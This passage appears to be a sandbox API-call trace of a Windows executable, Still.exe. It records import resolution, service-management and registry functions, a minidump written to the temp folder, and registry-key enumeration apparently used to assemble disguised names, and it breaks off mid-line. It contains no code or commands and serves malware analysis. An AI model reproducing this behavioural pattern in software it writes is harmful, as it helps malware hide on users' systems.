0x779e1f90 [0155.290] GetProcAddress (hModule=0x77970000, lpProcName="NtFsControlFile") returned 0x779e20a0 [0155.291] GetProcAddress (hModule=0x77970000, lpProcName="RtlImageNtHeader") returned 0x779bb4e0 [0155.291] GetProcAddress (hModule=0x77970000, lpProcName="RtlUnwind") returned 0x779d2d30 [0155.291] GetProcAddress (hModule=0x77970000, lpProcName="_chkstk") returned 0x779e5780 [0155.291] GetProcAddress (hModule=0x77970000, lpProcName="memset") returned 0x779e8190 [0155.291] GetProcAddress (hModule=0x77970000, lpProcName="memcpy") returned 0x779e7b00 [0155.291] GetProcAddress (hModule=0x77970000, lpProcName="RtlNtStatusToDosError") returned 0x779c5730 [0155.291] GetProcAddress (hModule=0x77970000, lpProcName="wcschr") returned 0x779e9950 [0155.291] GetProcAddress (hModule=0x77970000, lpProcName="memcmp") returned 0x779e7aa0 [0155.291] GetProcAddress (hModule=0x77970000, lpProcName="NtUnmapViewOfSection") returned 0x779e1fb0 [0155.292] GetProcAddress (hModule=0x77970000, lpProcName="NtDeleteFile") returned 0x779e29b0 [0155.292] GetProcAddress (hModule=0x77970000, lpProcName="_snprintf") returned 0x779e63a0 [0155.292] GetProcAddress (hModule=0x77970000, lpProcName="_wcslwr") returned 0x779e6c20 [0155.292] GetProcAddress (hModule=0x77970000, lpProcName="_snwprintf") returned 0x779e6450 [0155.292] GetProcAddress (hModule=0x77970000, lpProcName="NtOpenSection") returned 0x779e2080 [0155.292] GetProcAddress (hModule=0x77970000, lpProcName="_allmul") returned 0x779e5740 [0155.292] GetProcAddress (hModule=0x77970000, lpProcName="_aulldiv") returned 0x779e5960 [0155.292] GetProcAddress (hModule=0x77970000, lpProcName="_aulldvrm") returned 0x779e59d0 [0155.293] GetProcAddress (hModule=0x77970000, lpProcName="NtQueryVirtualMemory") returned 0x779e1f40 [0155.293] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x76ba0000 [0155.293] GetProcAddress (hModule=0x76ba0000, lpProcName="PathCombineW") returned 0x76bb8890 [0155.293] GetProcAddress (hModule=0x76ba0000, lpProcName="StrToIntExW") returned 0x76bb77c0 [0155.293] GetProcAddress (hModule=0x76ba0000, lpProcName="StrTrimW") returned 0x76bb7300 [0155.293] GetProcAddress (hModule=0x76ba0000, lpProcName="StrRChrW") returned 0x76bb84a0 [0155.294] GetProcAddress (hModule=0x76ba0000, lpProcName="StrStrW") returned 0x76bb7850 [0155.294] GetProcAddress (hModule=0x76ba0000, lpProcName="PathFileExistsW") returned 0x76bb4660 [0155.294] GetProcAddress (hModule=0x76ba0000, lpProcName="PathFindFileNameW") returned 0x76bb3c60 [0155.294] GetProcAddress (hModule=0x76ba0000, lpProcName="StrCmpNW") returned 0x76bb2800 [0155.294] GetProcAddress (hModule=0x76ba0000, lpProcName="PathFindExtensionW") returned 0x76bb3c20 [0155.294] GetProcAddress (hModule=0x76ba0000, lpProcName="StrChrW") returned 0x76bb27c0 [0155.294] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x772d0000 [0155.294] GetProcAddress (hModule=0x772d0000, lpProcName="SetEndOfFile") returned 0x7733f0e0 [0155.294] GetProcAddress (hModule=0x772d0000, lpProcName="SetUnhandledExceptionFilter") returned 0x772e6720 [0155.295] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcess") returned 0x7733ea10 [0155.295] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0155.295] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForSingleObject") returned 0x7733eca0 [0155.295] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcatW") returned 0x773271a0 [0155.295] GetProcAddress (hModule=0x772d0000, lpProcName="SetEvent") returned 0x7733ec50 [0155.295] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentThreadId") returned 0x772e8820 [0155.295] GetProcAddress (hModule=0x772d0000, lpProcName="ExitThread") returned 0x779d6390 [0155.295] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenW") returned 0x772e6c70 [0155.296] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0155.296] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteFileW") returned 0x7733ed40 [0155.296] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessId") returned 0x7733ea20 [0155.296] GetProcAddress (hModule=0x772d0000, lpProcName="GetLastError") returned 0x772e5010 [0155.296] GetProcAddress (hModule=0x772d0000, lpProcName="SetFilePointer") returned 0x7733f120 [0155.296] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0155.296] GetProcAddress (hModule=0x772d0000, lpProcName="GetDiskFreeSpaceExW") returned 0x7733eea0 [0155.296] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcpyW") returned 0x77327140 [0155.297] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileAttributesW") returned 0x7733f100 [0155.297] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0155.297] GetProcAddress (hModule=0x772d0000, lpProcName="MoveFileW") returned 0x7731e500 [0155.297] GetProcAddress (hModule=0x772d0000, lpProcName="HeapAlloc") returned 0x779b2dc0 [0155.297] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedIncrement") returned 0x772e7420 [0155.297] GetProcAddress (hModule=0x772d0000, lpProcName="HeapFree") returned 0x772e57f0 [0155.297] GetProcAddress (hModule=0x772d0000, lpProcName="CopyFileW") returned 0x7733f3b0 [0155.297] GetProcAddress (hModule=0x772d0000, lpProcName="ExitProcess") returned 0x772e3cb0 [0155.297] GetProcAddress (hModule=0x772d0000, lpProcName="GetCommandLineW") returned 0x772e4cc0 [0155.298] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEventA") returned 0x7733eb00 [0155.298] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcessHeap") returned 0x772e51f0 [0155.298] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleA") returned 0x772e50b0 [0155.298] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemTimeAsFileTime") returned 0x772e5530 [0155.298] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcmpW") returned 0x772e6bb0 [0155.298] GetProcAddress (hModule=0x772d0000, lpProcName="GetVersion") returned 0x772e56c0 [0155.298] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForMultipleObjects") returned 0x7733ec80 [0155.298] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThread") returned 0x772e46b0 [0155.298] GetProcAddress (hModule=0x772d0000, lpProcName="Sleep") returned 0x772e6760 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="CreateProcessW") returned 0x772e4610 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="GetExitCodeProcess") returned 0x772e3c60 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="CreateDirectoryW") returned 0x7733ece0 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="TerminateProcess") returned 0x772e67e0 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenA") returned 0x772e6c50 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSection") returned 0x779caf20 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteCriticalSection") returned 0x7799fb90 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="FindNextFileW") returned 0x7733ee40 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="ResetEvent") returned 0x7733ec40 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedDecrement") returned 0x772e73c0 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="FindClose") returned 0x7733ed70 [0155.299] GetProcAddress (hModule=0x772d0000, lpProcName="EnterCriticalSection") returned 0x779bb2d0 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentDirectoryW") returned 0x772e4e80 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="FindFirstFileW") returned 0x7733edf0 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryA") returned 0x772e5a80 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="LeaveCriticalSection") returned 0x779bb250 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="QueryDosDeviceW") returned 0x7733f080 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceCounter") returned 0x772e5da0 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="GetLogicalDriveStringsW") returned 0x7733efb0 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="GetDriveTypeW") returned 0x7733eed0 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesW") returned 0x7733ef10 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceFrequency") returned 0x772e5dc0 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="MultiByteToWideChar") returned 0x772e5c40 [0155.300] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileTime") returned 0x7733f140 [0155.301] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileMappingW") returned 0x772e44b0 [0155.301] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempPathW") returned 0x7733eff0 [0155.301] GetProcAddress (hModule=0x772d0000, lpProcName="UnmapViewOfFile") returned 0x772e68f0 [0155.301] GetProcAddress (hModule=0x772d0000, lpProcName="MapViewOfFile") returned 0x772e5be0 [0155.301] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleFileNameW") returned 0x772e5090 [0155.301] GetProcAddress (hModule=0x772d0000, lpProcName="ReadFile") returned 0x7733f090 [0155.301] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileSize") returned 0x7733ef30 [0155.301] GetProcAddress (hModule=0x772d0000, lpProcName="GetWindowsDirectoryW") returned 0x772e5730 [0155.301] GetProcAddress (hModule=0x772d0000, lpProcName="ExpandEnvironmentStringsW") returned 0x772e4a40 [0155.301] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempFileNameW") returned 0x7733efd0 [0155.301] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x756e0000 [0155.302] GetProcAddress (hModule=0x756e0000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x75700940 [0155.302] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyW") returned 0x756ff460 [0155.302] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextW") returned 0x756ffa40 [0155.302] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGenRandom") returned 0x75700730 [0155.302] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0155.303] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthority") returned 0x756ff230 [0155.303] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756fee90 [0155.303] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756fefb0 [0155.303] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthorityCount") returned 0x756ff420 [0155.303] GetProcAddress (hModule=0x756e0000, lpProcName="StartServiceCtrlDispatcherW") returned 0x75700900 [0155.303] GetProcAddress (hModule=0x756e0000, lpProcName="OpenSCManagerW") returned 0x75700540 [0155.303] GetProcAddress (hModule=0x756e0000, lpProcName="SetServiceStatus") returned 0x75700650 [0155.303] GetProcAddress (hModule=0x756e0000, lpProcName="RegDeleteValueW") returned 0x75700580 [0155.303] GetProcAddress (hModule=0x756e0000, lpProcName="DeleteService") returned 0x75712f50 [0155.304] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExW") returned 0x756ff530 [0155.304] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756fed60 [0155.304] GetProcAddress (hModule=0x756e0000, lpProcName="StartServiceW") returned 0x75703b20 [0155.304] GetProcAddress (hModule=0x756e0000, lpProcName="CloseServiceHandle") returned 0x756ffc00 [0155.304] GetProcAddress (hModule=0x756e0000, lpProcName="ControlService") returned 0x757126d0 [0155.304] GetProcAddress (hModule=0x756e0000, lpProcName="CreateServiceW") returned 0x75712790 [0155.304] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756fe580 [0155.304] GetProcAddress (hModule=0x756e0000, lpProcName="QueryServiceStatusEx") returned 0x756ffac0 [0155.305] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumKeyW") returned 0x756ff1d0 [0155.305] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x75760000 [0155.305] GetProcAddress (hModule=0x75760000, lpProcName="ShellExecuteExW") returned 0x758c4730 [0155.305] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x753c0000 [0155.322] GetProcAddress (hModule=0x753c0000, lpProcName="CreateStreamOnHGlobal") returned 0x74a02af0 [0155.322] VirtualProtect (in: lpAddress=0x401000, dwSize=0x7967, flNewProtect=0x1d0160, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0155.389] VirtualProtect (in: lpAddress=0x409000, dwSize=0xe76, flNewProtect=0x1d0140, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0155.389] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x658, flNewProtect=0x1d0148, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0155.389] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x4658, flNewProtect=0x1d0140, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0155.390] VirtualProtect (in: lpAddress=0x410000, dwSize=0x944, flNewProtect=0x1d0140, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0155.391] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0155.392] GetProcessHeap () returned 0x660000 [0155.392] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x466c) returned 0x67c8b0 [0155.474] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff54 | out: lpSystemTimeAsFileTime=0x19ff54*(dwLowDateTime=0xef087fe8, dwHighDateTime=0x1d63873)) [0155.474] QueryPerformanceFrequency (in: lpFrequency=0x19ff5c | out: lpFrequency=0x19ff5c*=100000000) returned 1 [0155.474] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff4c | out: lpPerformanceCount=0x19ff4c*=25061385575) returned 1 [0155.475] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x200 [0155.475] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0155.475] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x208) returned 0x67a8e0 [0155.475] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x67a8e0, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\Still.exe" (normalized: "c:\\windows\\syswow64\\still.exe")) returned 0x1d [0155.475] StrRChrW (lpStart="C:\\WINDOWS\\SysWOW64\\Still.exe", lpEnd=0x0, wMatch=0x5c) returned="\\Still.exe" [0155.475] lstrlenW (lpString="Still.exe") returned 9 [0155.475] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x6748a0 [0155.476] PathFindExtensionW (pszPath="Still.exe") returned=".exe" [0155.476] StrChrW (lpStart="Still", wMatch=0x3a) returned 0x0 [0155.476] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x73e40000 [0155.575] GetProcAddress (hModule=0x73e40000, lpProcName="MiniDumpWriteDump") returned 0x73e1aea0 [0155.580] lstrlenW (lpString="Still") returned 5 [0155.580] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x11 [0155.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x36) returned 0x677bf0 [0155.581] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x677bf0, nSize=0x11 | out: lpDst="C:\\WINDOWS\\TEMP\\") returned 0x11 [0155.581] lstrcatW (in: lpString1="C:\\WINDOWS\\TEMP\\", lpString2="Still" | out: lpString1="C:\\WINDOWS\\TEMP\\Still") returned="C:\\WINDOWS\\TEMP\\Still" [0155.581] lstrcatW (in: lpString1="C:\\WINDOWS\\TEMP\\Still", lpString2=".dmp" | out: lpString1="C:\\WINDOWS\\TEMP\\Still.dmp") returned="C:\\WINDOWS\\TEMP\\Still.dmp" [0155.581] CreateFileW (lpFileName="C:\\WINDOWS\\TEMP\\Still.dmp" (normalized: "c:\\windows\\temp\\still.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0155.648] SetFilePointer (in: hFile=0x208, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0155.648] SetEndOfFile (hFile=0x208) returned 1 [0155.649] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x401af6) returned 0x0 [0155.649] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x19ff80 | out: phkResult=0x19ff80*=0x20c) returned 0x0 [0155.654] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x0, lpName=0x19fd50, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0155.654] lstrlenW (lpString="ACPI") returned 4 [0155.654] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6748e0 [0155.654] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x1, lpName=0x19fd50, cchName=0x104 | out: lpName="AppID") returned 0x0 [0155.655] lstrlenW (lpString="AppID") returned 5 [0155.655] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674860 [0155.655] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x674720 [0155.655] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x2, lpName=0x19fd50, cchName=0x104 | out: lpName="AppReadiness") returned 0x0 [0155.655] lstrlenW (lpString="AppReadiness") returned 12 [0155.655] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x6746c0 [0155.655] lstrcmpW (lpString1="app", lpString2="app") returned 0 [0155.725] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6746c0 | out: hHeap=0x660000) returned 1 [0155.725] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x66abc0 [0155.725] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x3, lpName=0x19fd50, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0155.725] lstrlenW (lpString="Arbiters") returned 8 [0155.725] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x683068 [0155.725] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x4, lpName=0x19fd50, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0155.725] lstrlenW (lpString="BackupRestore") returned 13 [0155.725] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683090 [0155.725] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x6830b8 [0155.725] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x5, lpName=0x19fd50, cchName=0x104 | out: lpName="BitLocker") returned 0x0 [0155.725] lstrlenW (lpString="BitLocker") returned 9 [0155.725] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674900 [0155.725] lstrcmpW (lpString1="app", lpString2="bit") returned -1 [0155.726] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x6831d0 [0155.726] lstrcmpW (lpString1="backup", lpString2="locker") returned -1 [0155.726] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x6, lpName=0x19fd50, cchName=0x104 | out: lpName="CI") returned 0x0 [0155.726] lstrlenW (lpString="CI") returned 2 [0155.726] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x674960 [0155.726] lstrcmpW (lpString1="id", lpString2="ci") returned 1 [0155.726] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x7, lpName=0x19fd50, cchName=0x104 | out: lpName="Class") returned 0x0 [0155.726] lstrlenW (lpString="Class") returned 5 [0155.726] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674980 [0155.726] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x8, lpName=0x19fd50, cchName=0x104 | out: lpName="CMF") returned 0x0 [0155.726] lstrlenW (lpString="CMF") returned 3 [0155.726] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674660 [0155.726] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0155.726] lstrcmpW (lpString1="bit", lpString2="cmf") returned -1 [0155.726] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x9, lpName=0x19fd50, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0155.727] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0155.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x674740 [0155.727] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0155.727] lstrcmpW (lpString1="ci", lpString2="co") returned -1 [0155.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x6831a8 [0155.727] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0155.727] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0155.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675ee0 [0155.727] RegEnumKeyW (in: hKey=0x20c, dwIndex=0xa, lpName=0x19fd50, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0155.727] lstrlenW (lpString="COM Name Arbiter") returned 16 [0155.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674760 [0155.727] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0155.727] lstrcmpW (lpString1="bit", lpString2="com") returned -1 [0155.727] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0155.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6746c0 [0155.727] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0155.728] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682f50 [0155.728] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0155.728] RegEnumKeyW (in: hKey=0x20c, dwIndex=0xb, lpName=0x19fd50, cchName=0x104 | out: lpName="CommonGlobUserSettings") returned 0x0 [0155.728] lstrlenW (lpString="CommonGlobUserSettings") returned 22 [0155.728] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682ff0 [0155.728] lstrcmpW (lpString1="backup", lpString2="common") returned -1 [0155.728] lstrcmpW (lpString1="locker", lpString2="common") returned 1 [0155.728] lstrcmpW (lpString1="device", lpString2="common") returned 1 [0155.728] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6749a0 [0155.728] lstrcmpW (lpString1="acpi", lpString2="glob") returned -1 [0155.728] lstrcmpW (lpString1="name", lpString2="glob") returned 1 [0155.728] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6749c0 [0155.728] lstrcmpW (lpString1="acpi", lpString2="user") returned -1 [0155.729] lstrcmpW (lpString1="name", lpString2="user") returned -1 [0155.729] lstrcmpW (lpString1="glob", lpString2="user") returned -1 [0155.729] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682fc8 [0155.729] lstrcmpW (lpString1="arbiters", lpString2="settings") returned -1 [0155.729] RegEnumKeyW (in: hKey=0x20c, dwIndex=0xc, lpName=0x19fd50, cchName=0x104 | out: lpName="Compatibility") returned 0x0 [0155.729] lstrlenW (lpString="Compatibility") returned 13 [0155.729] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28) returned 0x675d00 [0155.729] RegEnumKeyW (in: hKey=0x20c, dwIndex=0xd, lpName=0x19fd50, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0155.729] lstrlenW (lpString="ComputerName") returned 12 [0155.729] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x6830e0 [0155.729] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0155.729] lstrcmpW (lpString1="settings", lpString2="computer") returned 1 [0155.729] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x674640 [0155.729] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0155.729] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0155.730] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674640 | out: hHeap=0x660000) returned 1 [0155.730] RegEnumKeyW (in: hKey=0x20c, dwIndex=0xe, lpName=0x19fd50, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0155.730] lstrlenW (lpString="ContentIndex") returned 12 [0155.730] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x6831f8 [0155.730] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0155.730] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0155.730] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674780 [0155.730] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0155.730] RegEnumKeyW (in: hKey=0x20c, dwIndex=0xf, lpName=0x19fd50, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0155.730] lstrlenW (lpString="CrashControl") returned 12 [0155.730] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x6747c0 [0155.730] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0155.730] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0155.730] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x683108 [0155.731] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0155.731] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0155.731] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0155.731] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x10, lpName=0x19fd50, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0155.731] lstrlenW (lpString="Cryptography") returned 12 [0155.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26) returned 0x675df0 [0155.731] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x11, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0155.731] lstrlenW (lpString="DeviceClasses") returned 13 [0155.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683130 [0155.731] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0155.731] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0155.731] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0155.731] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683130 | out: hHeap=0x660000) returned 1 [0155.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682f78 [0155.732] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0155.732] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0155.732] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0155.732] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0155.732] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x12, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceContainerPropertyUpdateEvents") returned 0x0 [0155.732] lstrlenW (lpString="DeviceContainerPropertyUpdateEvents") returned 35 [0155.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683040 [0155.732] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0155.732] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0155.732] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0155.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683040 | out: hHeap=0x660000) returned 1 [0155.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x683018 [0155.733] lstrcmpW (lpString1="readiness", lpString2="container") returned 1 [0155.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x683180 [0155.733] lstrcmpW (lpString1="arbiters", lpString2="property") returned -1 [0155.733] lstrcmpW (lpString1="settings", lpString2="property") returned 1 [0155.733] lstrcmpW (lpString1="computer", lpString2="property") returned -1 [0155.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683130 [0155.733] lstrcmpW (lpString1="backup", lpString2="update") returned -1 [0155.733] lstrcmpW (lpString1="locker", lpString2="update") returned -1 [0155.733] lstrcmpW (lpString1="device", lpString2="update") returned -1 [0155.733] lstrcmpW 